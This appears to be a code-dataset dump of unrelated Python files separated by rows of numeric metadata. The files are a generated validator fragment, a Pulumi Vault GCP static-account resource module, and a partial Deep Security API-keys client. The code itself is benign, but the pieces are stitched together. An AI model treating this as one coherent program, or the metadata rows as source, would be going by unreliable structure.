    if instance_name is None:
        raise GeneratedClassesError(
            "The required parameter 'instance_name' must not be 'None'.")
    # Shared validator returns an exception instance (or None); raise it here.
    error = GeneratedClassesTypeError.type_error(
        LinkedSourceDefinition, 'instance_name', instance_name, str, True)
    if error:
        raise error
    self._instance_name = instance_name
@property
def dbrmanbkploc(self):
    """Gets the dbrmanbkploc of this LinkedSourceDefinition.

    Backup Location with no ending \\

    :return: The dbrmanbkploc of this LinkedSourceDefinition.
    :rtype: str
    """
    # Read-only view of the backing field; validation happens in the setter.
    return self._dbrmanbkploc
@dbrmanbkploc.setter
def dbrmanbkploc(self, dbrmanbkploc):
    """Sets the dbrmanbkploc of this LinkedSourceDefinition.

    Backup Location with no ending \\

    :param dbrmanbkploc: The dbrmanbkploc of this LinkedSourceDefinition.
    :type dbrmanbkploc: str
    """
    # Required attribute: reject a missing value up front.
    if dbrmanbkploc is None:
        raise GeneratedClassesError(
            "The required parameter 'dbrmanbkploc' must not be 'None'.")
    # Shared validator returns an exception instance (or None); raise it here.
    error = GeneratedClassesTypeError.type_error(
        LinkedSourceDefinition, 'dbrmanbkploc', dbrmanbkploc, str, True)
    if error:
        raise error
    # Value must contain no whitespace. (None was already rejected above,
    # so no separate None re-check is needed before the pattern match.)
    if not re.search('^$|^[^\\s]*$', dbrmanbkploc):
        raise GeneratedClassesError(
            "Invalid value for 'dbrmanbkploc', was '{}' but must follow the"
            " pattern '^$|^[^\\s]*$'.".format(dbrmanbkploc))
    self._dbrmanbkploc = dbrmanbkploc
| 43.192513
| 215
| 0.529281
| 2,008
| 24,231
| 6.202689
| 0.079183
| 0.057808
| 0.070654
| 0.043356
| 0.832356
| 0.789964
| 0.779045
| 0.728784
| 0.701887
| 0.645363
| 0
| 0.000843
| 0.412736
| 24,231
| 560
| 216
| 43.269643
| 0.87442
| 0.255252
| 0
| 0.722222
| 1
| 0
| 0.127862
| 0.018661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067901
| false
| 0.052469
| 0.018519
| 0
| 0.123457
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
df80adf9def3552704f6d80759b672ae53dc1f5a
| 23,469
|
py
|
Python
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-10-07T17:44:18.000Z
|
2022-03-30T20:46:33.000Z
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-10-11T18:13:07.000Z
|
2022-03-31T21:09:41.000Z
|
sdk/python/pulumi_vault/gcp/secret_static_account.py
|
pulumi/pulumi-vault
|
1682875f4a5d7d508f36e166529ad2b8aec34090
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-10-28T10:08:40.000Z
|
2020-03-17T14:20:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SecretStaticAccountArgs', 'SecretStaticAccount']
@pulumi.input_type
class SecretStaticAccountArgs:
    # Constructor-side input bag for a SecretStaticAccount resource.
    # Generated by the Pulumi Terraform Bridge; properties mirror the
    # Terraform schema for vault_gcp_secret_static_account.
    def __init__(__self__, *,
                 backend: pulumi.Input[str],
                 service_account_email: pulumi.Input[str],
                 static_account: pulumi.Input[str],
                 bindings: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]] = None,
                 secret_type: Optional[pulumi.Input[str]] = None,
                 token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a SecretStaticAccount resource.

        :param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
        :param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
        :param pulumi.Input[str] static_account: Name of the Static Account to create
        :param pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        :param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        # Required inputs are always recorded; optional inputs only when the
        # caller actually supplied them, so unset properties stay absent.
        pulumi.set(__self__, "backend", backend)
        pulumi.set(__self__, "service_account_email", service_account_email)
        pulumi.set(__self__, "static_account", static_account)
        if bindings is not None:
            pulumi.set(__self__, "bindings", bindings)
        if secret_type is not None:
            pulumi.set(__self__, "secret_type", secret_type)
        if token_scopes is not None:
            pulumi.set(__self__, "token_scopes", token_scopes)

    @property
    @pulumi.getter
    def backend(self) -> pulumi.Input[str]:
        """
        Path where the GCP Secrets Engine is mounted
        """
        return pulumi.get(self, "backend")

    @backend.setter
    def backend(self, value: pulumi.Input[str]):
        pulumi.set(self, "backend", value)

    @property
    @pulumi.getter(name="serviceAccountEmail")
    def service_account_email(self) -> pulumi.Input[str]:
        """
        Email of the GCP service account to manage.
        """
        return pulumi.get(self, "service_account_email")

    @service_account_email.setter
    def service_account_email(self, value: pulumi.Input[str]):
        pulumi.set(self, "service_account_email", value)

    @property
    @pulumi.getter(name="staticAccount")
    def static_account(self) -> pulumi.Input[str]:
        """
        Name of the Static Account to create
        """
        return pulumi.get(self, "static_account")

    @static_account.setter
    def static_account(self, value: pulumi.Input[str]):
        pulumi.set(self, "static_account", value)

    @property
    @pulumi.getter
    def bindings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]:
        """
        Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        """
        return pulumi.get(self, "bindings")

    @bindings.setter
    def bindings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]):
        pulumi.set(self, "bindings", value)

    @property
    @pulumi.getter(name="secretType")
    def secret_type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        """
        return pulumi.get(self, "secret_type")

    @secret_type.setter
    def secret_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret_type", value)

    @property
    @pulumi.getter(name="tokenScopes")
    def token_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        return pulumi.get(self, "token_scopes")

    @token_scopes.setter
    def token_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "token_scopes", value)
@pulumi.input_type
class _SecretStaticAccountState:
    # State-side input bag used by SecretStaticAccount.get(); unlike the Args
    # class, every field here is optional (lookups may be partial).
    def __init__(__self__, *,
                 backend: Optional[pulumi.Input[str]] = None,
                 bindings: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]] = None,
                 secret_type: Optional[pulumi.Input[str]] = None,
                 service_account_email: Optional[pulumi.Input[str]] = None,
                 service_account_project: Optional[pulumi.Input[str]] = None,
                 static_account: Optional[pulumi.Input[str]] = None,
                 token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering SecretStaticAccount resources.

        :param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
        :param pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        :param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        :param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
        :param pulumi.Input[str] service_account_project: Project the service account belongs to.
        :param pulumi.Input[str] static_account: Name of the Static Account to create
        :param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        # Record only the fields the caller actually supplied.
        if backend is not None:
            pulumi.set(__self__, "backend", backend)
        if bindings is not None:
            pulumi.set(__self__, "bindings", bindings)
        if secret_type is not None:
            pulumi.set(__self__, "secret_type", secret_type)
        if service_account_email is not None:
            pulumi.set(__self__, "service_account_email", service_account_email)
        if service_account_project is not None:
            pulumi.set(__self__, "service_account_project", service_account_project)
        if static_account is not None:
            pulumi.set(__self__, "static_account", static_account)
        if token_scopes is not None:
            pulumi.set(__self__, "token_scopes", token_scopes)

    @property
    @pulumi.getter
    def backend(self) -> Optional[pulumi.Input[str]]:
        """
        Path where the GCP Secrets Engine is mounted
        """
        return pulumi.get(self, "backend")

    @backend.setter
    def backend(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "backend", value)

    @property
    @pulumi.getter
    def bindings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]:
        """
        Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        """
        return pulumi.get(self, "bindings")

    @bindings.setter
    def bindings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecretStaticAccountBindingArgs']]]]):
        pulumi.set(self, "bindings", value)

    @property
    @pulumi.getter(name="secretType")
    def secret_type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        """
        return pulumi.get(self, "secret_type")

    @secret_type.setter
    def secret_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "secret_type", value)

    @property
    @pulumi.getter(name="serviceAccountEmail")
    def service_account_email(self) -> Optional[pulumi.Input[str]]:
        """
        Email of the GCP service account to manage.
        """
        return pulumi.get(self, "service_account_email")

    @service_account_email.setter
    def service_account_email(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_account_email", value)

    @property
    @pulumi.getter(name="serviceAccountProject")
    def service_account_project(self) -> Optional[pulumi.Input[str]]:
        """
        Project the service account belongs to.
        """
        return pulumi.get(self, "service_account_project")

    @service_account_project.setter
    def service_account_project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_account_project", value)

    @property
    @pulumi.getter(name="staticAccount")
    def static_account(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the Static Account to create
        """
        return pulumi.get(self, "static_account")

    @static_account.setter
    def static_account(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "static_account", value)

    @property
    @pulumi.getter(name="tokenScopes")
    def token_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        return pulumi.get(self, "token_scopes")

    @token_scopes.setter
    def token_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "token_scopes", value)
class SecretStaticAccount(pulumi.CustomResource):
    # Pulumi resource wrapping vault_gcp_secret_static_account.
    # Two typed __init__ overloads are declared for IDEs/type checkers; the
    # real __init__ dispatches to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 backend: Optional[pulumi.Input[str]] = None,
                 bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
                 secret_type: Optional[pulumi.Input[str]] = None,
                 service_account_email: Optional[pulumi.Input[str]] = None,
                 static_account: Optional[pulumi.Input[str]] = None,
                 token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 __props__=None):
        """
        Creates a Static Account in the [GCP Secrets Engine](https://www.vaultproject.io/docs/secrets/gcp/index.html) for Vault.

        Each [static account](https://www.vaultproject.io/docs/secrets/gcp/index.html#static-accounts) is tied to a separately managed
        Service Account, and can have one or more [bindings](https://www.vaultproject.io/docs/secrets/gcp/index.html#bindings) associated with it.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_gcp as gcp
        import pulumi_vault as vault

        this = gcp.service_account.Account("this", account_id="my-awesome-account")
        gcp = vault.gcp.SecretBackend("gcp",
            path="gcp",
            credentials=(lambda path: open(path).read())("credentials.json"))
        static_account = vault.gcp.SecretStaticAccount("staticAccount",
            backend=gcp.path,
            static_account="project_viewer",
            secret_type="access_token",
            token_scopes=["https://www.googleapis.com/auth/cloud-platform"],
            service_account_email=this.email,
            bindings=[vault.gcp.SecretStaticAccountBindingArgs(
                resource=this.project.apply(lambda project: f"//cloudresourcemanager.googleapis.com/projects/{project}"),
                roles=["roles/viewer"],
            )])
        ```

        ## Import

        A static account can be imported using its Vault Path. For example, referencing the example above,

        ```sh
        $ pulumi import vault:gcp/secretStaticAccount:SecretStaticAccount static_account gcp/static-account/project_viewer
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        :param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        :param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
        :param pulumi.Input[str] static_account: Name of the Static Account to create
        :param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SecretStaticAccountArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Creates a Static Account in the [GCP Secrets Engine](https://www.vaultproject.io/docs/secrets/gcp/index.html) for Vault.

        Each [static account](https://www.vaultproject.io/docs/secrets/gcp/index.html#static-accounts) is tied to a separately managed
        Service Account, and can have one or more [bindings](https://www.vaultproject.io/docs/secrets/gcp/index.html#bindings) associated with it.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_gcp as gcp
        import pulumi_vault as vault

        this = gcp.service_account.Account("this", account_id="my-awesome-account")
        gcp = vault.gcp.SecretBackend("gcp",
            path="gcp",
            credentials=(lambda path: open(path).read())("credentials.json"))
        static_account = vault.gcp.SecretStaticAccount("staticAccount",
            backend=gcp.path,
            static_account="project_viewer",
            secret_type="access_token",
            token_scopes=["https://www.googleapis.com/auth/cloud-platform"],
            service_account_email=this.email,
            bindings=[vault.gcp.SecretStaticAccountBindingArgs(
                resource=this.project.apply(lambda project: f"//cloudresourcemanager.googleapis.com/projects/{project}"),
                roles=["roles/viewer"],
            )])
        ```

        ## Import

        A static account can be imported using its Vault Path. For example, referencing the example above,

        ```sh
        $ pulumi import vault:gcp/secretStaticAccount:SecretStaticAccount static_account gcp/static-account/project_viewer
        ```

        :param str resource_name: The name of the resource.
        :param SecretStaticAccountArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two overloads above: either a single
        # SecretStaticAccountArgs object or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(SecretStaticAccountArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       backend: Optional[pulumi.Input[str]] = None,
                       bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
                       secret_type: Optional[pulumi.Input[str]] = None,
                       service_account_email: Optional[pulumi.Input[str]] = None,
                       static_account: Optional[pulumi.Input[str]] = None,
                       token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       __props__=None):
        # Normalize resource options, validate required properties, then
        # register the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (not looking one up by id).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SecretStaticAccountArgs.__new__(SecretStaticAccountArgs)

            # Required properties may only be omitted when rehydrating by URN.
            if backend is None and not opts.urn:
                raise TypeError("Missing required property 'backend'")
            __props__.__dict__["backend"] = backend
            __props__.__dict__["bindings"] = bindings
            __props__.__dict__["secret_type"] = secret_type
            if service_account_email is None and not opts.urn:
                raise TypeError("Missing required property 'service_account_email'")
            __props__.__dict__["service_account_email"] = service_account_email
            if static_account is None and not opts.urn:
                raise TypeError("Missing required property 'static_account'")
            __props__.__dict__["static_account"] = static_account
            __props__.__dict__["token_scopes"] = token_scopes
            # Output-only property; the provider fills it in.
            __props__.__dict__["service_account_project"] = None
        super(SecretStaticAccount, __self__).__init__(
            'vault:gcp/secretStaticAccount:SecretStaticAccount',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            backend: Optional[pulumi.Input[str]] = None,
            bindings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]]] = None,
            secret_type: Optional[pulumi.Input[str]] = None,
            service_account_email: Optional[pulumi.Input[str]] = None,
            service_account_project: Optional[pulumi.Input[str]] = None,
            static_account: Optional[pulumi.Input[str]] = None,
            token_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'SecretStaticAccount':
        """
        Get an existing SecretStaticAccount resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] backend: Path where the GCP Secrets Engine is mounted
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SecretStaticAccountBindingArgs']]]] bindings: Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        :param pulumi.Input[str] secret_type: Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        :param pulumi.Input[str] service_account_email: Email of the GCP service account to manage.
        :param pulumi.Input[str] service_account_project: Project the service account belongs to.
        :param pulumi.Input[str] static_account: Name of the Static Account to create
        :param pulumi.Input[Sequence[pulumi.Input[str]]] token_scopes: List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        # Merge the provider-assigned id into the options, rebuild the state
        # bag, and construct a resource object bound to the existing resource.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _SecretStaticAccountState.__new__(_SecretStaticAccountState)

        __props__.__dict__["backend"] = backend
        __props__.__dict__["bindings"] = bindings
        __props__.__dict__["secret_type"] = secret_type
        __props__.__dict__["service_account_email"] = service_account_email
        __props__.__dict__["service_account_project"] = service_account_project
        __props__.__dict__["static_account"] = static_account
        __props__.__dict__["token_scopes"] = token_scopes
        return SecretStaticAccount(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def backend(self) -> pulumi.Output[str]:
        """
        Path where the GCP Secrets Engine is mounted
        """
        return pulumi.get(self, "backend")

    @property
    @pulumi.getter
    def bindings(self) -> pulumi.Output[Optional[Sequence['outputs.SecretStaticAccountBinding']]]:
        """
        Bindings to create for this static account. This can be specified multiple times for multiple bindings. Structure is documented below.
        """
        return pulumi.get(self, "bindings")

    @property
    @pulumi.getter(name="secretType")
    def secret_type(self) -> pulumi.Output[str]:
        """
        Type of secret generated for this static account. Accepted values: `access_token`, `service_account_key`. Defaults to `access_token`.
        """
        return pulumi.get(self, "secret_type")

    @property
    @pulumi.getter(name="serviceAccountEmail")
    def service_account_email(self) -> pulumi.Output[str]:
        """
        Email of the GCP service account to manage.
        """
        return pulumi.get(self, "service_account_email")

    @property
    @pulumi.getter(name="serviceAccountProject")
    def service_account_project(self) -> pulumi.Output[str]:
        """
        Project the service account belongs to.
        """
        return pulumi.get(self, "service_account_project")

    @property
    @pulumi.getter(name="staticAccount")
    def static_account(self) -> pulumi.Output[str]:
        """
        Name of the Static Account to create
        """
        return pulumi.get(self, "static_account")

    @property
    @pulumi.getter(name="tokenScopes")
    def token_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        List of OAuth scopes to assign to `access_token` secrets generated under this static account (`access_token` static accounts only).
        """
        return pulumi.get(self, "token_scopes")
| 48.489669
| 248
| 0.67276
| 2,690
| 23,469
| 5.656877
| 0.080297
| 0.082408
| 0.067162
| 0.044818
| 0.872248
| 0.84859
| 0.839784
| 0.825721
| 0.808241
| 0.790892
| 0
| 0.000055
| 0.22583
| 23,469
| 483
| 249
| 48.590062
| 0.83747
| 0.385019
| 0
| 0.679842
| 1
| 0
| 0.128824
| 0.058439
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158103
| false
| 0.003953
| 0.027668
| 0
| 0.280632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10e2e09c13037747bff3d97730e99ec3387750dc
| 48,100
|
py
|
Python
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/api_keys_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class APIKeysApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_api_key(self, api_key, api_version, **kwargs): # noqa: E501
"""Create an API Key # noqa: E501
Create a new API key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_api_key(api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ApiKey api_key: The settings of the new API key. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
else:
(data) = self.create_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
return data
def create_api_key_with_http_info(self, api_key, api_version, **kwargs):  # noqa: E501
    """Create an API Key  # noqa: E501

    Create a new API key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_api_key_with_http_info(api_key, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ApiKey api_key: The settings of the new API key. (required)
    :param str api_version: The version of the api being called. (required)
    :return: ApiKey
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments accepted beyond the positional parameters.
    all_params = ['api_key', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: locals() snapshot is taken here on purpose — `params` then holds
    # self/api_key/api_version/kwargs; extra kwargs are folded in below, so
    # no local variables may be introduced above this line.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key' is set
    if ('api_key' not in params or
            params['api_key'] is None):
        raise ValueError("Missing the required parameter `api_key` when calling `create_api_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `create_api_key`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    # The API version is carried in a request header, not the path.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # The ApiKey settings object is serialized as the JSON request body.
    body_params = None
    if 'api_key' in params:
        body_params = params['api_key']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['DefaultAuthentication']  # noqa: E501

    return self.api_client.call_api(
        '/apikeys', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiKey',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_api_key(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Delete an API Key # noqa: E501
Delete an API key by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_api_key(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.delete_api_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
return data
def delete_api_key_with_http_info(self, api_key_id, api_version, **kwargs):  # noqa: E501
    """Delete an API Key  # noqa: E501

    Delete an API key by ID.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_api_key_with_http_info(api_key_id, api_version, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int api_key_id: The ID number of the API key to delete. (required)
    :param str api_version: The version of the api being called. (required)
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Recognized keyword arguments; anything else raises TypeError below.
    all_params = ['api_key_id', 'api_version']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the local namespace so positional args and validated
    # keyword args can be read uniformly as params['name'] below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_api_key" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'api_key_id' is set
    if ('api_key_id' not in params or
            params['api_key_id'] is None):
        raise ValueError("Missing the required parameter `api_key_id` when calling `delete_api_key`")  # noqa: E501
    # verify the required parameter 'api_version' is set
    if ('api_version' not in params or
            params['api_version'] is None):
        raise ValueError("Missing the required parameter `api_version` when calling `delete_api_key`")  # noqa: E501

    # NOTE(review): re.search only requires one digit somewhere in the
    # value; it does not anchor the whole string against `\d+`.
    if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])):  # noqa: E501
        raise ValueError("Invalid value for parameter `api_key_id` when calling `delete_api_key`, must conform to the pattern `/\\d+/`")  # noqa: E501

    collection_formats = {}

    # api_key_id fills the {apiKeyID} template in the request path.
    path_params = {}
    if 'api_key_id' in params:
        path_params['apiKeyID'] = params['api_key_id']  # noqa: E501

    query_params = []

    # api_version is sent as the `api-version` request header.
    header_params = {}
    if 'api_version' in params:
        header_params['api-version'] = params['api_version']  # noqa: E501

    form_params = []
    local_var_files = {}

    # DELETE sends no request body.
    body_params = None
    # HTTP header `Accept`
